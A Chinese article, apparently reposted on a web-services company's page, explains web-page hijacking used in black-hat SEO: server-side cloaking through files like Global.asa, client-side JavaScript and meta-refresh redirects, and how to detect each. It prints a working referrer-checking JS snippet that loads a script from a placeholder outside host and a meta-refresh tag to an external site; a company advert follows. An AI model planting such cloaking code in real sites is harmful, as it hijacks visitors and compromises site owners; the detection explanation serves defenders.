網(wǎng)頁(yè)劫持是目前黑帽SEO或者說黑產(chǎn)最喜歡的一種網(wǎng)頁(yè)引流方式，此手法往往通過***政府、教育機(jī)構(gòu)網(wǎng)站（權(quán)重高），修改網(wǎng)站源代碼、放寄生蟲程序、設(shè)置二級(jí)目錄反向代理等實(shí)現(xiàn)。網(wǎng)頁(yè)劫持可以分為服務(wù)端劫持、客戶端劫持、百度快照劫持、百度搜索劫持等等；表現(xiàn)形式可以是劫持跳轉(zhuǎn)，也可以是劫持呈現(xiàn)的網(wǎng)頁(yè)內(nèi)容，目前被廣泛應(yīng)用于游戲、×××等暴利行業(yè)。
　在iis7網(wǎng)站劫持檢測(cè)中，這些問題可以比較清楚的檢查出來，從而幫助我們更加清晰的知道要解決什么問題。
　服務(wù)端劫持
　服務(wù)端劫持也稱為全局劫持，手法為修改網(wǎng)站動(dòng)態(tài)語(yǔ)言文本，判斷訪問來源控制返回內(nèi)容，從來達(dá)到網(wǎng)站劫持的目的。
　asp/aspx/php劫持
　Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊，作用是在每次執(zhí)行一個(gè)動(dòng)態(tài)腳本的時(shí)候，都會(huì)先加載該腳本， 然后再執(zhí)行目標(biāo)腳本。所以只要在 Global.asa 中寫判斷用戶系統(tǒng)信息的代碼（訪問來源等），如果是蜘蛛訪問則返回關(guān)鍵詞網(wǎng)頁(yè)（想要推廣的網(wǎng)站），如果是用戶訪問，則返回正常頁(yè)面。
　客戶端劫持
　客戶端劫持的手法也很多，但主要就是2種：js劫持、Header劫持。
　js劫持
　js劫持目的：通過向目標(biāo)網(wǎng)頁(yè)植入惡意js代碼，控制網(wǎng)站跳轉(zhuǎn)、隱藏頁(yè)面內(nèi)容、窗口劫持等。
　js植入手法：可以通過***服務(wù)器，直接寫入源代碼中；也可以寫在數(shù)據(jù)庫(kù)中，因?yàn)橛行╉?yè)面會(huì)呈現(xiàn)數(shù)據(jù)庫(kù)內(nèi)容。
　js劫持案例
　效果：通過搜索引擎搜索點(diǎn)擊頁(yè)面（執(zhí)行一段js）跳轉(zhuǎn)到×××頁(yè)面；直接輸入網(wǎng)址訪問網(wǎng)頁(yè)，跳轉(zhuǎn)到404頁(yè)面。
　代碼：
　today=new Date();
　today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
　var regexp=/.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9-]+){1,2}\//ig;
　var where =document.referer;
　if(regexp.test(where)){
　document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');
　}
　else
　{
　window.location.href="../../404.htm";
　}
　分析：通過referer判斷來路，如果referer來路為空就是跳轉(zhuǎn)到404頁(yè)面，如果是搜索引擎來的referer里面也會(huì)有顯示，然后在寫代碼控制跳轉(zhuǎn)。如果只是控制實(shí)現(xiàn)顯示不同的內(nèi)容，可以修改php、asp代碼；如果需要劫持搜索引擎搜索框，可以寫JS代碼來做瀏覽器本地跳轉(zhuǎn)。當(dāng)然js功能可以無限擴(kuò)展，比如可以控制一個(gè)ip一天內(nèi)第一次訪問正常，其余訪問跳轉(zhuǎn)等等。
　header劫持
　在源代碼中寫入以下代碼：
　1
　<meta http-equiv=“refresh“ content=“10; url=http://thief.one“>
　利用的就是Meta Refresh Tag（自動(dòng)轉(zhuǎn)向），將流量引走。
　手法對(duì)比
　客戶端劫持與服務(wù)端區(qū)別
　客戶端劫持：每次訪問網(wǎng)頁(yè)從服務(wù)端獲取到的網(wǎng)頁(yè)代碼都是相同的，只是控制了網(wǎng)頁(yè)代碼在瀏覽器中呈現(xiàn)的效果（比如是否進(jìn)行跳轉(zhuǎn)等）。
　服務(wù)端劫持：改變了每次訪問網(wǎng)頁(yè)從服務(wù)端獲取到的網(wǎng)頁(yè)代碼。
　客戶端劫持與服務(wù)端判斷方法
　客戶端劫持的判斷方法：只需觀察瀏覽器呈現(xiàn)的網(wǎng)頁(yè)前端代碼，查看是否引用了不當(dāng)?shù)膉s，或者其它敏感內(nèi)容。
　服務(wù)端劫持的判斷方法：可以通過觀察網(wǎng)站后端代碼，或者通過改變ip，包頭等方式，觀察放回源碼是否不同。。

成立與2013年成都創(chuàng)新互聯(lián)公司專注于”幫助中小企業(yè)+互聯(lián)網(wǎng)”, 也是目前成都地區(qū)具有實(shí)力的互聯(lián)網(wǎng)服務(wù)商。團(tuán)隊(duì)致力于為企業(yè)提供--站式網(wǎng)站建設(shè)、移動(dòng)端應(yīng)用( H5手機(jī)營(yíng)銷、成都APP應(yīng)用開發(fā)、微信開發(fā))、軟件開發(fā)、信息化解決方案等服務(wù)。

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn，海內(nèi)外云服務(wù)器15元起步，三天無理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

網(wǎng)站名稱：網(wǎng)頁(yè)劫持的一些說明-創(chuàng)新互聯(lián)
文章網(wǎng)址：http://www.rwnh.cn/article6/epiig.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)頁(yè)設(shè)計(jì)公司、企業(yè)網(wǎng)站制作、App開發(fā)、網(wǎng)站改版、面包屑導(dǎo)航、做網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)